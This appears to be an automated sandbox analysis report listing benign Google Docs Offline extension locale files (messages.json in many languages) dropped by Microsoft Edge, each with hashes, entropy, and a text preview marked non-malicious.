                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\fr\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):977
                                                                                                                                                                                                                                                                  Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                  MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                  SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                  SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                  SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\fr_CA\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):972
                                                                                                                                                                                                                                                                  Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                  MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                  SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                  SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                  SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\gl\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):990
                                                                                                                                                                                                                                                                  Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                  MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                  SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                  SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                  SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\gu\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1658
                                                                                                                                                                                                                                                                  Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                                  MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                                  SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                                  SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                                  SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\hi\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1672
                                                                                                                                                                                                                                                                  Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                                  MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                                  SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                                  SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                                  SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\hr\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):935
                                                                                                                                                                                                                                                                  Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                                  MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                                  SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                                  SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                                  SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\hu\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1065
                                                                                                                                                                                                                                                                  Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                                  MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                                  SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                                  SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                                  SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\hy\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2771
                                                                                                                                                                                                                                                                  Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                  MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                  SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                  SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                  SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\id\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):858
                                                                                                                                                                                                                                                                  Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                  MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                  SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                  SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                  SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\is\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):954
                                                                                                                                                                                                                                                                  Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                  MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                  SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                  SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                  SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\it\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):899
                                                                                                                                                                                                                                                                  Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                  MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                  SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                  SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                  SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\iw\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2230
                                                                                                                                                                                                                                                                  Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                  MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                  SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                  SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                  SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\ja\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1160
                                                                                                                                                                                                                                                                  Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                  MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                  SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                  SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                  SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

